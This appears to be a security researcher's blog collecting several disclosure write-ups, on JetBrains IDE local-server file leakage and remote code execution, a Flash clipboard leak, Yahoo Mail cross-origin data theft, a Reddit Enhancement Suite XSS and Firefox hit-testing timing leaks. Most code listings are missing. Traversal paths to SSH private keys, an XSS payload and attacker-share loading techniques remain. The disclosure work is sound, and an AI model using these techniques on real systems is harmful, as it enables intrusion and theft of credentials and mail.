From at least 2013 until May 2016 JetBrains’ IDEs were vulnerable to local file leakage, with the Windows (EDIT: and OS X) versions additionally being vulnerable to remote code execution. The only prerequisite for the attack was to have the victim visit an attacker-controlled webpage while the IDE was open.
Affected IDEs included PyCharm, Android Studio, WebStorm, IntelliJ IDEA and several others.
I’ve tracked the core of most of these issues (CORS allowing all origins + always-on webserver) back to the addition of the webserver to WebStorm in 2013. It’s my belief that all JetBrains IDEs with always-on servers since then are vulnerable to variants of these attacks.
The arbitrary code execution vuln affecting Windows and OS X was in all IDE releases since at least July 13, 2015, but was probably exploitable earlier via other means.
All of the issues found were fixed in the patch released May 11th 2016.
To follow along with this you’ll need a copy of PyCharm 5.0.4, or an old build of PyCharm 2016.1 since this has been patched for a while now. Obviously you’ll want to do this in a VM.
I had just started working on some inter-protocol exploitation research and was looking for some interesting targets. Thinking that I must have some interesting services running on my own device, I ran lsof -P -ITCP | grep LISTEN
to see what programs were listening on a local TCP port. I got back:
1 2 3 |
|
Hmm, I’ve used PyCharm as my IDE of choice for a while now, but never noticed that it bound to any ports… Might it be some sort of ad-hoc IPC mechanism? Let’s nmap it to figure out what’s being sent over those ports, and what the protocol is:
1 2 3 4 5 6 7 8 |
|
Looks like an HTTP server? Unusual for a local application… Let’s see what CORS headers it serves up with responses:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
|
Something smells off here. PyCharm’s HTTP server is essentially saying that web pages on any origin (including http://attacker.com
) are allowed to make credentialed requests to it and read the response. What the heck is this HTTP server, though? Does it serve anything sensitive? Do we even care if random pages are able to read its contents?
After searching the web for references to that port number, we find that this is related to a WebStorm feature added in early 2013 (WebStorm is another of JetBrains’ IDEs.) The idea was that you wouldn’t need to set up your own web server to preview your pages in a browser. You could just click a “view in browser” button inside WebStorm and it would navigate your browser to http://localhost:63342/<projectname>/<your_file.html>
. Any scripts or subresources that the page tried to include would similarly be served up via URLs like http://localhost:63342/<projectname>/some_script.js
. Fancy.
To verify that PyCharm embeds the same server as WebStorm, let’s create a project named “testing” in PyCharm and place a file named “something.txt” in the root and see if we can fetch it:
1 2 3 4 5 6 7 8 9 10 11 12 |
|
Yikes, so any site can read any of your project files so long as they can guess the project name and filename. This would obviously include any in-tree configuration files that contained secrets like AWS keys and the like. Here’s an HTML snippet we could include on attacker.com
that would do the same thing as our cURL command:
1 2 3 4 5 6 |
|
This is pretty bad, but as-is this would mostly be useful for targeted attacks. It’s a pain to have to guess at directory structures to get at the interesting files, so what are some ways we can weaponize this?
Let’s see if we can read files outside of the project directory. There are some files (like SSH keys, etc) that live at standard locations and are interesting for an attacker. Much more interesting than possible credentials for some database that might not even be accessible to us.
The obvious thing to do is see how it handles dot segments in the request URI:
1 2 |
|
Bah. Per the spec dot segments in paths must be normalized away by either the client or the server. cURL’s behaviour here is the same as you’d see in a browser. Luckily PyCharm’s internal HTTP server treats dot segments with urlencoded /
s like %2F..%2F
as semantically equivalent to the unencoded /../
form, and browsers will not normalize those away.
1 2 3 4 5 6 7 8 9 10 |
|
Great success! Our only limitation here is that we must know the name of a project the victim has open. Requesting /invalidproject/<anything>
will always 404.
The obvious choice is to use a dictionary of potential project names a user could have open, and try to request /<potential_projectname>/.idea/workspace.xml
(which is a metadata file automatically added to most JetBrains projects.)
1 2 3 4 |
|
We got a 200 for testing
, so we know it’s a valid project.
A naive PoC for this in JavaScript:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 |
|
There’s no rate-limiting, and I was able to try about 2000 project names a second using this method with Chrome even on my older laptop.
At this point, I started looking at the various APIs that PyCharm exposed via the same webserver. Having to guess a valid, open project name to leak files is a big mitigating factor, and the API might give us a way around that.
Eventually I came upon the /api/internal
endpoint, which corresponds to JetBrainsProtocolHandlerHttpService
. Apparently this lets you pass in a JSON blob containing a URL with a jetbrains:
scheme, and the IDE will do something special with it. As far as I can tell, none of the IDEs actually install a systemwide handler for those URLs, and those URLs are undocumented. In any case, let’s look for some interesting jetbrains:
URLs we can pass it.
The jetbrains://<project_name>/open/<path>
handler seems promising:
1 2 3 4 5 6 7 8 9 10 11 12 |
|
This lets us open a project by passing in its absolute path. The /etc
directory exists on most *NIX-like systems, let’s try opening that:
1
|
|
Dang, so the directory needs to actually contain a JetBrains-style project, we can’t just pass any old directory. Lucky for us, PyCharm 2016.1 and above ship with a JetBrains-style project in their system folder! Under OS X this will be in /Applications/PyCharm.app/Contents/helpers
, let’s try that:
1
|
|
Bingo. Now we don’t have to guess at an open project name as we now know the helpers
project is open. There’s no standard location for PyCharm’s root folder under Linux (it’s wherever the user happened to untar
it to,) but we can determine it by reqesting /api/about?more=true
and looking at the homePath
key:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
|
Once we’ve opened the helpers
project, we determine the user’s home directory from the /api/about?more=true
response and use that to construct a URL to their SSH keys like /helpers/..%2f..%2f..%2f..%2f..%2f..%2fhome/<user>/.ssh/id_rsa
:
1 2 3 4 5 6 7 8 9 10 |
|
The above trick with opening the helpers
directory that ships with PyCharm obviously only works if the user has PyCharm 2016.1 installed, everywhere else we still have to guess an open project name. How about something that works reliably with the other JetBrains IDEs like IntelliJ IDEA and Android Studio?
Since the jetbrains://project/open
handler lets us pass a completely arbitrary path for the project to open, UNC paths are an obvious choice. UNC paths are a windows-specific path form that allows you to reference files on a network share, and they like \\servername\sharename\filepath
. Many of Windows’ file APIs (and the Java APIs that wrap them) will happily take UNC paths and transparently connect to an SMB share on another computer, allowing you to read and write to the remote files as if they were local. If we can get the IDE to open a project from our SMB share, we won’t need to guess at what projects might be on the victim’s computer.
To test, I set up a remote Samba instance with an unauthenticated SMB share named “anontesting” that contained a JetBrains project, then tried opening it:
1
|
|
Great. Assuming the victim’s ISP doesn’t block outbound SMB traffic (due to the large number of worms that have historically propagated via SMB vulns) we can get them to load an arbitrary project from an SMB share we control.
Wait a second, seems like we can do something a lot more interesting than arbitrary file reads. With one request we can get Windows users to load an attacker-controlled project from our remote SMB share. There’s almost certainly abuse potential here, and we don’t have to look far to find it.
The projects for each of JetBrains’ IDEs have a notion of startup tasks. In PyCharm you can have a Python script run automatically on project load, and similarly on Android Studio and IntelliJ IDEA you can have a .jar
run. Here I’ve made it so that the hax.py
script in the project root will be automatically run when the project opens:
Now we just need to add a hax.py
file to our project root containing:
1 2 3 |
|
We then put the project on our anonymous SMB share, and host a page with our payload that will cause the victim to load the malicious project:
1 2 3 4 5 |
|
As soon as the victim navigates to that page, our payload will trigger and the calculator will open:
After this post was initially published comex pointed out that OS X will auto-mount remote NFS shares when you access them via the /net
autofs
mountpoint. That means exploiting the RCE under OS X is pretty similar to Windows, but we create an anonymous NFS share and open /net/<hostname>/<sharename>/<projectname>
:
1
|
|
with the HTML PoC looking something like:
1 2 3 4 5 |
|
This likely applies to any *NIX-like with an autofs
mountpoint that uses -hosts
, but OS X is the only OS I could find where autofs
is configured like this in the default install.
JetBrains took several steps that I’m aware of to remediate this:
4xx
status code.Host
header’s value is now validated to prevent similar exploits via DNS rebindingI’d like to specifically thank Hadi Hariri and the rest of the JetBrains team for their proactive response to my report. My email requesting a security contact was answered within an hour of my sending it, and the issue was resolved relatively quickly.
They sent me a patchset against intellij-community
and a binary build with their proposed solutions, and were receptive to my feedback when I mentioned potential issues.
Lastly, even though Jetbrains doesn’t have a bug bounty program that I’m aware of, and I definitely wasn’t expecting anything, Jetbrains quite generously awarded a bounty of $50,000 for my report and help reviewing the patch. I’ve asked them to donate the bulk of this to the PyPy project to fund improved Python 3 support, fingers crossed for await/async
support in PyPy :).
intellij-community
repo for reviewFlash only allows read access to the clipboard in event handlers triggered by paste
events, but Flash wasn’t checking if the clipboard contents had changed since entering the event handler. Due to quirks in how Flash’s event handlers work, an attacker could read from and write to the clipboard for hours after the user navigated away from page containing the SWF, even after navigating away or closing the incognito window.
All that messing around with Flash in my previous posts made me think that I should read more into Flash security. Even if you hate Flash as a user, it’s deployed pretty much everywhere and it’s valuable attack surface! It ended up paying off, after a couple days of testing and reading the docs, I was left with a new bug, CVE-2014-0504:
Let’s go into the combination of issues and possibly surprising behaviour in Flash that allowed clipboard leaking.
This isn’t the first time Flash has had issues with clipboard access. Back in the days of Flash 9, you could write to the clipboard with no interaction at all. That caused a few problems, so when Flash 10 rolled around, Adobe added a few restrictions to clipboard functionality:
First, the new Clipboard
API only allowed writing to the clipboard when inside certain event handlers (mousedown
, keydown
, copy
, etc.)
Second, that event handler had to have been triggered by user interaction, meaning that event handlers triggered by dispatchEvent
et al. cannot write to the clipboard.
1 2 3 |
|
Additionally, a method allowing you to read from the clipboard was added. This was restricted even more, and could only be called inside user-initiated paste
events.
1 2 3 4 |
|
We’ve established that to call Clipboard.getData
we must be in a paste
event handler, and that handler must have been triggered by the user. As far as I can tell, there’s no way around that. Can we still abuse it?
The obvious thing to check is if we can block inside the event handler. In many browsers, blocking in an event handler in Flash will cause a plugin hang, and a prompt to kill the plugin will spawn. Chrome, however, keeps right on trucking, even when Flash is executing something like while(true){;}
1. The UI and JavaScript all work as usual, a prompt to kill the plugin will only be displayed if the user opens another tab that uses Flash. Actually, our handler will continue to execute even when the tab containing our SWF is closed!
Given that we aren’t really penalized for sitting around in a privileged event handler, there’s nothing to stop us from just calling Clipboard.getData()
in a loop and checking for changes. We can just get the user to paste something non-sensitive, then abuse our clipboard access to read sensitive information that gets added to it later.
Here’s a basic demonstration of the issue:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
|
To trigger the exploit, we need to convince the victim to paste something into our SWF. There are a number of usage patterns we could abuse to do that, but I liked the fake captcha method kkotowicz used for his cross-domain content extraction attack. We give the user a random string, and ask them to paste it into “verification box” (actually our SWF,) telling them it’s required to prove they’re not a bot:
Flash will not allow a single event handler to run for longer than 60 seconds. A 60 second window for clipboard access is obviously not ideal for us.
Luckily, the time limit is on individual event handlers, and the paste event bubbles. We can just give our paste target tons of parent elements that also handle paste
events, and allow the event to bubble up before the handler gets killed, Then we can log the clipboard for 60~ seconds * \<num of parents\>
:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
|
Unfortunately, I couldn’t find a way to make Flash send HTTP requests while inside the event handler. However, we can pass the data to JavaScript and have it send the data to our servers, since our ActionScript handlers won’t block JS:
1
|
|
1 2 3 |
|
The ExternalInterface
method has the caveat that it will longer work after we’ve navigated away from the page or the tab was closed, even though our event handler will continue to run. As a fallback, we can use Flash’s TCP socket support, which allows synchronous communication. Again, with a caveat that it only seems allow sending a single message while in the event handler 2:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
|
So we can leak the clipboard remotely even after navigating away. That’s neat, but we can actually do a lot more! Remember how Flash allows us to write to the clipboard in certain handlers as well? That lets us do all sorts of sneaky things, like detect when someone copies what looks like HTML, and then modify it to include a malware script. Even better, we can detect clipboard contents that look like commands and slip our own payload into them!
1 2 3 4 5 6 7 8 9 10 11 12 |
|
The code for a full PoC is here, and a live version without the echo server is also up here.
The initial fix was to expose a sequence number to Flash so it could tell if the clipboard state had changed since the initial event was raised, and block access to the clipboard. That stayed in place for a while, but some time after that it was replaced with a change that blocked clipboard reads 10 seconds after the event was raised. If I had to guess why, some application probably relied on being able to do multiple clipboard reads and writes in the same event handler.
Being able to read the clipboard 10 seconds after the initial paste event still seems a bit much, but it’s definitely better than how it was before.
Socket
class is useful something other than bypassing the user’s proxy!Firefox on Linux demonstrates similar behaviour, but allows Flash’s event handlers to continue executing even after the browser has closed.↩
Again, Firefox on Linux behaves differently. You can send / receive as much as you want, even after the browser has closed. It’s possible that Chrome’s behaviour is a bug.↩
A .swf on Yahoo’s CDN had a vulnerability that enabled near-complete control over Yahoo! Mail crossorigin. The .swf itself is fixed, but the configuration issue that allowed a .swf completely unrelated to Yahoo! Mail to do something like that still exists.
So, in the last article we established that YMail’s crossdomain.xml
rules are incredibly lax:
1 2 3 4 5 |
|
They allow .swfs on any subdomain of yahoo.com
to read resources on YMail crossorigin. Last time we abused a crossorigin proxy on hk.promotions.yahoo.com
to serve up our own .swf that would request pages from YMail and leak them back to us. The crossorigin proxy has since been patched, but the loose crossdomain.xml
rules remain. Assuming there’s no way for us to serve our own .swf through yahoo.com
anymore, how can we exploit these rules without using MITM attacks? Well, we abuse vulnerabilities in .swfs that are legitimately hosted on subdomains of yahoo.com
.
Let’s look for a .swf that will allow us to make arbitrary requests, and read the response. With a little searching we find a good candidate, hotspotgallery.swf, related to a feature on Yahoo! Autos that gives 3D tours of cars. Normally it’s served up on sp.yimg.com
, which isn’t a domain allowed by YMail’s crossdomain.xml
, but with a little finagling we find that the same .swf can also be accessed on img.autos.yahoo.com.
Let’s take a peek at the ActionScript from the decompiler to see why this .swf is useful to us:
1 2 3 4 5 6 7 |
|
Immediately we notice the Security.allowDomain("*")
, which is usually not a good sign. The reason for that is Flash has a feature where you can embed a crossorigin .swf inside your own. You can access and call the public members of the embedded .swf’s MovieClip
object, but normally this is disallowed unless the embedding .swf is same-origin with it.
Security.allowDomain()
allows you to relax that restriction for specific domains, and this .swf is saying .swfs from any domain can access its MovieClip
’s public members. Security.allowDomain("*")
isn’t necessarily a security issue on its own, unless your .swf’s public members do or store something security sensitive. Now, this .swf is vulnerable, and to see why we’ll look at the loadXML2()
method:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
|
As you can see, the code makes a request to this.dataPath
concatenated with this.exteriorXML1
. When it gets a response, it parses it as XML, and stores the result in this.DATA3
. But we control all 3 of those members due to the public
access modifiers and Security.allowDomain("*")
, and can both read from and write to them from .swfs on our own domain. Given that we control the URL requested, can read the response, and can trigger the behaviour at will, all from a crossorigin Flash document, we’ve got crossorigin data leakage!
Well… with a few caveats:
GET
sLet’s start by making some ActionScript to embed and exploit hotspotgallery.swf
. From here on you will need to be logged in to Yahoo! for some links to work. Here we’ve got a very simple JS<->Flash proxy in the style of CrossXHR. It loads up the vulnerable .swf, sets its public members so it’ll request the resource we want to leak, then returns the response back to JS:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 |
|
Now here’s the tricky part. We need to find interesting, leakable endpoints. We can’t leak them if they return invalid XML (ruling out most webpages and JSON containing HTML fragments,) we can’t leak them if they return a non-200 status code, and we can’t leak them if they require an auth token we can’t guess.
Some alternative endpoints for the Social API fit the bill nicely. They let us fetch the current user’s contacts and profile without requiring an auth token or user ID. You can see those leaking to a page we control here:
One that stumped me for a long time was getting the user’s mail. All of the endpoints for mail listings required a valid WSSID (web services session id?) Unfortunately, all the endpoints I could find that would give me one had non-200 response codes or wouldn’t parse as XML. I eventually found what I was looking for by running YMail’s android app through mitmproxy. Here you can see the WSSID we wanted, returned with a 200 response code. Even though this endpoint’s normally requested with a POST
method, a GET
with no params still gives us the WSSID… Sweet!
Let’s leak the user’s mail now. We’ve got a mail search endpoint here that will return mail fragments without embedded HTML. You can see you’ll still sometimes get angle brackets in the response due to inline replies, but you can muck with the query to get around those.
Now, that WSSID functions as a CSRF token as well, so we can now do anything we want as the current user. We can send mail as them, delete all their emails, basically anything a normal user can do.
Here’s a small page demonstrating a bunch of things we can do as long as the user is on a page we control. As you can see, We’ve got the full list of contacts, all of the user’s personal details including their email address and name, and a listing of their emails.
We’ve got enough for a fully-weaponized exploit at this point. We can not only leak their emails, we can also achieve lateral movement by triggering password resets on other services they use, and pulling the reset URLs right out of their email, then deleting them. Of course, previously emailed username/password combos are fair game, too. Very handy for the APT folks ;)
hotspotgallery.swf
’s allowDomain call has since been changed to Security.allowDomain("sp.yimg.com")
, but that doesn’t fix the core issue. There are thousands and thousands of forgotten .swfs on disused subdomains, many of which are probably vulnerable to similar exploits. As long as those crossdomain.xml
rules are as loose as they are, it’s only a matter of time before someone finds one and exploits YMail… again.
.swfs that actually need crossorigin access to YMail should be moved to the existing mail.yimg.com
subdomain, and the crossdomain.xml
should be tightened up to keep YMail safe from rogue galleries of Asian imports and pet shows.
The other thing I want to mention is the initial response I got. I initially submitted an overview of the issue and attached a proof-of-concept that put the JSON from the contacts endpoint in a textbox. Very rudimentary, but sufficient to show crossorigin data leakage. All I got in response was a form reply basically saying “This is intended behaviour, wontfix”. I replied asking why they thought that, and if they had any issues reproducing the issue, but didn’t receive a reply.
I know that reproing Flash issues can be a pain in the ass, and I realized the PoC would break if served from localhost, so I hosted a version with no setup required that more clearly showed what was leaked. I posted a link to the new PoC, reiterating what was being leaked. Still no response. It wasn’t until I posted the version that leaked mail contents 8 months later that I got an unscripted reply.
I get that Yahoo! probably receives tons of spurious reports every day, but without something actionable like “I don’t think X is a bug because Y” or “I’m unable to reproduce the issue, Z happens instead”, reporters don’t have anything to go on if they’re reporting a genuine issue. Without any feedback on what the issue is with the report, their only way to potentially get the bug fixed is through public disclosure (which an operator of a bug bounty probably doesn’t want.) I also know this isn’t an isolated case, since I recently saw a presentation where an RCE on Yahoo!’s reverse proxies got the same treatment.
To Yahoo’s credit, the fellow who responded to my updated proof-of-concept was decently communicative, but every response I’d ever received from Yahoo up ‘til that point had been a scripted response of “fixed”, “wontfix”, “confirmed”, or “new”. When I work with a company (either as a consultant or just through one-off reports,) nothing impresses me more than engineers responding with additional details relevant to my reports, and nothing turns me off more than the company being difficult to communicate with, money or no.
crossdomain.xml
s are fixed, .swfs and endpoints where the whole response body is controlled are extra-juicy targetsyimg.com
may also be available on l.yimg.com
, or even subdomains of yahoo.com
yimg.com
. I never bothered auditing them because they’re a pain to trace through, but the WayBack machine is your friend when it comes to finding these orphaned .swfsThe library that Reddit Enhancement Suite (a browser extension for reddit users) used for HTML sanitization had a bug that bit them pretty hard, enabling DOM-based XSS of 1.5~ million reddit users. RES pushed out a fixed version, and reddit deployed a script to prevent users of the old version from accidentally getting exploited; thus preventing an XSS worm.
If you’re a user of Reddit Enhancement Suite, chances are you recently saw this big scary alert() box when you tried to click an expando button:
For those who aren’t familiar with RES, an expando is an inline preview of offsite content, or content that would normally require a clickthrough, that can be viewed by pressing an “expando” button:
A few people have asked questions like “why am I getting that alert?”, “what exactly is this bug?”, “why can’t I just use the vulnerable version anyways?”. Rather than respond to each question separately, I decided to write something that would hopefully answer everyone’s questions at once.
Interestingly, the most important part of the RES exploit wasn’t found by looking at RES at all. I actually found it by poking around reddit’s markdown library, Snudown. Snudown is mostly written in C, and is a fork of the Sundown markdown library. Snudown departs from Sundown in a number of ways, the most important to us being that it adds the ability to include a restricted subset of HTML alongside your markdown. On reddit, markdown with inline HTML may only be used on the wiki, as it’s intended to allow using HTML tables instead of Sundown’s unwieldly markdown tables.
So let’s go into a simplified view of how Snudown did attribute whitelisting. Snudown scanned everything after the tag name, and before a >
for valid attr=value
pairs, reading everything into the attr
buffer as it went. Once Snudown realized it was not dealing with a valid valid/value pair, it would clear the attr buffer and start looking for the next valid pair. Once it decided it had hit the end of the value (by encountering a space outside the quotes, or a >
anywhere), it would output everything in the attr
buffer, clear it, then continue parsing attributes. Some interesting consequences of the process, <table scope== scope=bar>
was sanitized to <table scope=bar>
, and <table bad=scope="bar">
was sanitized to <table scope="bar">
.
Those outputs aren’t consistent with most HTML parsers, but the biggest issue was how it handled quotes: Snudown saw <table scope=a' bar=baz'>
as a table
with a single scope
attribute, but every mainstream browser sees this as a table
with both scope
and bar
attributes. Quotes are only treated as attribute delimiters when they occur at the beginning of the value, otherwise whitespace is the delimiter. Since Snudown was outputting every validated attr/value pair verbatim, we could abuse this behaviour to sneak attributes like onmouseover
by the whitelist!
No. See, even though Snudown performs its own sanitization on inline HTML, Snudown’s output generally isn’t trusted within reddit’s codebase. All of the HTML that comes out of Snudown gets put through a SAX / BeautifulSoup-based sanitizer that validates the HTML and reserializes it in a way that’s unambiguous across browsers. For example, the ambiguous:
1
|
|
passes both validation steps, but becomes the unambiguous:
1
|
|
when reserialized by reddit’s SAX sanitizer.
To reiterate, though reddit used Snudown’s wiki rendering mode, reddit was never vulnerable to XSS due to additional precautions taken with its output.
I knew that reddit itself wasn’t vulnerable, so before I did anything, I wanted to check if anyone else was using Snudown’s wiki rendering mode in production, outside of users of the reddit codebase. One thing that kept popping up was SnuOwnd, a faithful port of Snudown (with all its quirks) to JS. As some of you may have noticed from the RES changelogs, the Reddit Enhancement Suite also includes SnuOwnd. RES actually uses SnuOwnd for a number of things, and that used to include HTML sanitization:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
|
Eep.
Even if we can’t get an XSS on reddit.com proper, RES is still a pretty juicy target. With an install base of 1.5~ million users — which includes a good chunk of reddit’s moderators — an XSS in RES could do a lot of damage.
Now all that’s left is to find where safeHTML or sanitizeHTML are passed untrusted data, and we’ve got ourselves an XSS via extension. If it wasn’t apparent from the alert dialog, that injection point is in RES’ expandos:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
imageLink.imageTitle
is completely controlled by the attacker, and provided we can get one of RES’ supported sites to serve our Snudown-evading payload, RES will inject it into the DOM.
RES supports expanding text posts from Tumblr inline, and Tumblr allows us to use valid HTML in post titles, so if we made a post with the title Foobar <img src=foo' onerror="alert(1)" ' />
, alert(1)
would be called when they expanded our link:
This was about as bad as it gets without having a zero-interaction XSS. Comment pages have a “Show Images” button that expands all images on the page, and those get used a lot for picture threads. Had someone posted a child comment to one of the top comments with a link to the payload, they could have easily started an XSS worm that spammed links to the payload in other threads. Once it spread, the worm could have done things like upvote specific submissions, nuke a subreddit if a moderator got exploited, etc.
This bug required fixes in a number of places to keep it fully closed. First, Snudown’s HTML sanitization was changed to first parse the attributes, then unambiguously reserialize its interpretation. That fix was then ported to SnuOwnd’s JS implementation.
Secondly, RES was changed to use a custom HTML sanitizer based on DOMParser since things like href
sanitization were out of scope for Snudown. I’m not super happy with this filter, and I think Google Caja should be used in the future, but this one had to go in due to time constraints.
Third, since the issue was so trivial to exploit, and had such high impact, it was necessary to block users still on vulnerable versions of RES from opening expandos to prevent an XSS worm from spreading. reddit ended up doing this on their end by detecting attempts to open the expandos and blocking it based on a version number RES places in the DOM:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
|
Since Yahoo recently revamped their Responsible Disclosure program, I figured I’d have a go at finding some vulnerabilities. All of *.yahoo.com
is in scope, and Yahoo has a lot of legacy behind it, so I started going through the more obscure subdomains manually. One of the subdomains I looked at a lot was hk.promotions.yahoo.com
. It’s a good place to look because it has lots of PHP scripts and Flash, it looks like it wasn’t done by Yahoo’s core devs, and most auditors aren’t looking there since its content is mostly in Chinese.
I ended up on http://hk.promotions.yahoo.com/petshow2011/
, apparently a page for a Hongkongese pet show that happened in 2011:
As you can see from the request log, something on the page was requesting data from another domain through a crossdomain proxy: http://hk.promotions.yahoo.com/petshow2011/php/getImages.php?file=<url>
.
Crossdomain proxies are generally goldmines for vulnerabilities, and this one’s no different. First of all, it doesn’t whitelist the URLs that we may make requests to, and the proxy is positioned inside Yahoo’s internal network, so we can have it proxy out resources that would normally be inacessible. I tested with a .corp.yahoo.com
URL I found on google, and ended up with some uninteresting, but normally inaccessible search statistics. Other SSRF attacks were likely posible, but I didn’t poke it too much other than to verify that local file disclosure wasn’t possible.
Second, since the proxy doesn’t set a Content-Type
on the response and we control the response body, we’ve got XSS on hk.promotions.yahoo.com
thanks to type sniffing!
That’s nice and all, but XSS on a mostly-static subdomain isn’t that interesting to me. Now, remember that we control the entire body of the proxy’s response and that there’s no Content-Type
. That means we can also proxy an SWF and have it be same-origin with hk.promotions.yahoo.com
. Why’s a SWF any more useful to us than HTML? Because of overly-permissive crossdomain.xml rules.
Flash checks for a <destination domain>/crossdomain.xml
file before attempting a crossorigin request, to see if SWFs from the sender’s origin may read the response (among other things, see “Further Reading”.) For example, if you wanted to allow SWFs on any subdomain of yahoo.com
to do crossdomain reads to your domain, you might put a rule like this in your crossdomain.xml
:
1
|
|
That’s probably overly permissive, *.yahoo.com
is a lot of attack surface, but let’s take a look at what Yahoo actually has in their crossdomain.xml
s.
1 2 3 4 5 |
|
1 2 3 4 5 6 7 |
|
ca-mg5.mail.yahoo.com (webmail server, returns valid crossdomain.xml
when logged in):
1 2 3 4 5 |
|
YMail actually has the least secure crossdomain policy of any of the subdomains that I checked. That secure="false"
will allow SWFs served over HTTP to read resources only served over HTTPS, making the forced HTTPS a lot less useful. Per Adobe, “Using false in an HTTPS policy file is not recommended because this compromises the security offered by HTTPS.”
Well, now we know we can get an arbitrary SWF same-origin with a subdomain of yahoo.com
, and we know that SWF can read from a number of subdomains on yahoo.com
, let’s get some emails!
First, we need to pick the SWF to proxy. The obvious choice for someone who doesn’t know Flash well is a SWF<->JS XHR proxy. These allow you to proxy requests from JS through a specialized SWF. Here was the result, with some overzealous redaction:
Looks like our proxied proxy works, the response body includes all of my test account’s auth tokens and personal info. One of those tokens allows us to access a JSON endpoint that lists our e-mails:
and we can use those message IDs to pull up specific emails from the user’s inbox:
and since we can read pages containing CSRF tokens, we can delete the user’s emails, send emails as the current user, etc:
Funky. The most obvious application of this attack would be to determine the user’s email, initiate a password reset on any “interesting” sites, read the password reset URL from their email, then delete the email; but there’s plenty of others.
Well, the affected page was for a Hongkongese pet show that happened in 2011, so the fix was removing the page and its associated crossdomain proxy. I’m disappointed that the crossdomain.xml
rules are still as loose as they are, but I don’t think that’s getting changed anytime soon. Subsequent reports mentioning the crossdomain.xml
rules have been marked WONTFIX.
There were SSRF and crossdomain data leakage issues due to a misconfigured crossdomain proxy and overly-permissive crossdomain.xml
rules. One was able to leak the emails of the current user, and do anything the user could do from YMail just by having them visit an attacker-controlled page.
This instance of the issue is fixed, but the crossdomain.xml
rules are still overly-permissive.
document.elementFromPoint
and document.caretPositionFromPoint
implementations.
I was looking at ways to automatically exploit another bug that required user interaction when I noticed elementFromPoint and caretPositionFromPoint on the MDN. Curious as to how they behaved with frames, I did a little testing.
I made an example page to test:
1 2 3 |
|
elementFromPoint(x,y)
behaved exactly as I expected, when used in the web console it returned the iframe on my page:
1 2 |
|
caretPositionFromPoint(x,y)
, however, was returning elements from the page on cbc.ca!
1 2 |
|
But there was a small snag: I couldn’t actually access the CaretPosition
’s offsetNode
from JS without getting a security exception.
It seems that Firefox noticed that offsetNode
was being set to an element from a cross-origin document, and wrapped the CaretPosition
object
so that I couldn’t access any of its members from my document. Great.
However, I found I could access offsetNode
when it was set to null. offsetNode
seems to be set to null when the topmost
element at a given point is a button, and that includes scrollbar thumbs. That’s great for us, because knowing the size and location of the frame’s scrollbar thumb
tells us how large the framed document is, and also allows us to leak which elements exist on the page.
For example here’s what we can infer about https://tomcat.apache.org/tomcat-5.5-doc/ssl-howto.html#Create_a_local_Certificate_Signing_Request_(CSR) through its scrollbars:
The vertical scrollbar thumb has obviously moved, so we know that an element with an id of Create_a_local_Certificate_Signing_Request_(CSR)
exists in the framed document.
The following function is used to test offsetNode
accessibility at a given point in the document:
1 2 3 4 5 6 7 8 |
|
Knowing the page’s size and whether certain elements are present is nice, but I wanted more. I remembered Paul Stone’s excellent paper about timing attacks on browser renderers and figured a timing attack might help us here.
caretPositionFromPoint
has to do hit testing on the document to determine what the topmost element is at a given point,
and I figured that’s not likely to be a constant time operation. It was also clear that hit testing was being performed on cross-origin frame contents, since caretPositionFromPoint
was returning elements from them.
I guessed that the time it took for a caretPositionFromPoint(x,y)
call to return would leak information about the element at (x,y)
.
To test my theory I made a script that runs caretPositionFromPoint(x,y)
on a given point 50 times, then stores the median time that the call took to complete. Using the median is important so we can eliminate timing differences due to unrelated factors, like CPU load at the time of the call.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
|
Once we’ve gathered timing measurements for all of the points across the iframe, we can make a visualization of the differences:
Neat.
You can see a number of things in the timing data: the bounding boxes of individual elements, how the lines of text wrap, the position of the bullets in the list, etc.
It also seems that even though elementFromPoint
doesn’t return elements from the framed document, it still descends into it for its hit testing, so it’s vulnerable to
the same timing attack as caretPositionFromPoint
.
So we can infer quite a bit about the framed document from the timing information, but can we actually steal text from it? Maybe, with a lot of work, depending on the page’s styling.
I’d hoped that caretPositionFromPoint
’s real purpose (determining what character index the caret should be at for a given point) would yield large enough timing differences to leak the width of individual characters, but that didn’t seem to be the case.
Since we can tell how wide a line of text is, we can extract text using a similar method to sirdarckcat’s. First we measure how long the line is, then we make the iframe more narrow to force the text to wrap, then we subtract the new width of the the line from the old width, giving us the width of the word that just wrapped.
Since most sites use variable-width fonts (“O” and “i” are different widths on this blog, for example,) many small words have distinct widths that make them easy to pick out. With longer words, there may be a number of valid words with that width, however an attacker may be able to determine what word fits best using the context of the surrounding words.
Note that since we need to force text wrapping to get these measurements, it’s harder to steal text from fixed-width pages, or pages that display a horizontal scrollbar instead of wrapping text (like view-source:
URIs.) Pages that use fixed-width fonts are also more difficult to analyze because characters do not have distinct widths, we can only determine the number of characters in a word.
Note that the last Firefox version these actually work in is 26
, if you want to try them out you’ll have to find a download for it.
Judging from Robert O’Callahan’s fix, it looks like Firefox was using a general hit testing function that descended cross-document for both elementFromPoint
and caretPositionFromPoint
. The fix was to disable cross-document descent in the hit testing function when called by either elementFromPoint
or caretPositionFromPoint
.
caretPositionFromPoint
leaked info through offsetNode
accessibilityelementFromPoint
